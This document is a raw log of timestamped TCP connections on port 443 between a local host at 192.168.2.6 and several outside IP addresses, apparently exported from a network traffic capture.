Jan 14, 2025 18:22:23.381370068 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:23.381381035 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:23.381516933 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:23.381544113 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.032953024 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.033231974 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.033268929 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.034157991 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.034229994 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.038145065 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.038209915 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.038333893 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.046737909 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.046927929 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.046947956 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.050546885 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.050610065 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.050930977 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.051103115 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.083333969 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.086714029 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.086759090 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.102340937 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.102353096 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.132463932 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.147983074 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.181356907 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.181421041 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.181672096 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.183054924 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:24.183093071 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:24.251940966 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.252042055 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.252125978 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.252558947 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.252602100 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.252655029 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.252959013 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.252974987 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.253326893 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.253365040 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.732184887 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.732300043 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.734404087 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.734415054 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.734426022 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.734437943 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.735328913 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.735358000 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.735393047 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.735449076 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.736717939 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.736776114 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.737118959 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.737183094 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.737276077 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.737294912 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.778722048 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.779417992 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:24.779481888 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:24.828450918 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:25.105364084 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:25.105382919 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:25.105416059 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:25.105443954 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:25.105447054 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:25.105489969 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:25.151377916 CET | 49724 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:25.151398897 CET | 443 | 49724 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:25.166273117 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.166311026 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.166426897 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.166505098 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.166538000 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.166621923 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.166941881 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.166959047 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.167090893 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.167103052 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.868074894 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.868781090 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.868793011 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.869822979 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.870002031 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.870007992 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.870145082 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.871213913 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.871270895 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.871602058 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.871607065 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.900777102 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.901051044 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.901077032 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.904648066 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.904742002 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.904751062 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.904791117 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.906505108 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.906676054 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.907201052 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.907207966 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:25.919461966 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:25.947472095 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.112106085 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.112194061 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.112319946 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.161341906 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.161370993 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.161439896 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.161488056 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.161530972 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.368669033 CET | 49731 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.368709087 CET | 443 | 49731 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.376164913 CET | 49730 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.376202106 CET | 443 | 49730 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.381989002 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:26.401787043 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.401819944 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.401885986 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.401943922 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.401985884 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.402050018 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.402275085 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.402288914 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.402476072 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:26.402491093 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:26.423331022 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.016192913 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.017514944 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.017539024 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.018539906 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.018625021 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.018631935 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.018666983 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.019438982 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.019498110 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.019665956 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.019671917 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.026335955 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.026556015 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.026618958 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.028089046 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.028162956 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.028182983 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.028239012 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.028698921 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.028785944 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.028897047 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.028911114 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.086716890 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.086733103 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.224374056 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.224559069 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.224601984 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.224865913 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.224889040 CET | 443 | 49723 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.224914074 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.224934101 CET | 49723 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.226596117 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.226633072 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.226694107 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.227008104 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.227022886 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.265203953 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.265259027 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.265295029 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.266079903 CET | 49740 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.266083956 CET | 443 | 49740 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276799917 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276829004 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276838064 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276887894 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.276897907 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276909113 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.276951075 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.278297901 CET | 49741 | 443 | 192.168.2.6 | 185.15.59.240 |
Jan 14, 2025 18:22:27.278305054 CET | 443 | 49741 | 185.15.59.240 | 192.168.2.6 |
Jan 14, 2025 18:22:27.692079067 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.692373037 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.692395926 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.692892075 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.694036007 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.694128990 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.694267035 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.735342026 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.802587032 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.802618980 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.802673101 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.802697897 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.802727938 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.804687977 CET | 49748 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.804723978 CET | 443 | 49748 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.864455938 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.864504099 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:27.864676952 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.864891052 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:27.864906073 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.347371101 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.347691059 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.347712994 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.348599911 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.348663092 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.349319935 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.349380016 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.349603891 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.349608898 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.399076939 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.457349062 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.457370996 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.457420111 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.457446098 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.457458973 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:28.457494974 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.763282061 CET | 49751 | 443 | 192.168.2.6 | 192.124.249.155 |
Jan 14, 2025 18:22:28.763303995 CET | 443 | 49751 | 192.124.249.155 | 192.168.2.6 |
Jan 14, 2025 18:22:32.411043882 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:32.411206961 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:32.411269903 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:33.979607105 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:33.979648113 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:38.669502020 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:38.669614077 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:38.669699907 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:38.669926882 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:38.669956923 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.127860069 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.128323078 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.128391981 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.129301071 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.129378080 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.130512953 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.130574942 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.130697012 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.171335936 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.180299044 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.180344105 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.227288961 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.256643057 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.256709099 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.256844044 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.260559082 CET | 49827 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.260601044 CET | 443 | 49827 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.271646976 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.271752119 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.271861076 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.272023916 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.272053003 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.277069092 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.277174950 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.277252913 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.277412891 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.277447939 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.729832888 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.730371952 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.730436087 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.731435061 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.731532097 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.732131958 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.732198954 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.732319117 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.774048090 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.774111032 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.820918083 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.885668993 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.885737896 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.885824919 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.887679100 CET | 49832 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:39.887706041 CET | 443 | 49832 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:39.908580065 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.909181118 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.909199953 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.910300016 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.910375118 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.911467075 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.911546946 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.911669970 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.955332994 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:39.961532116 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:39.961546898 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.006575108 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.226226091 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.226299047 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.226368904 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
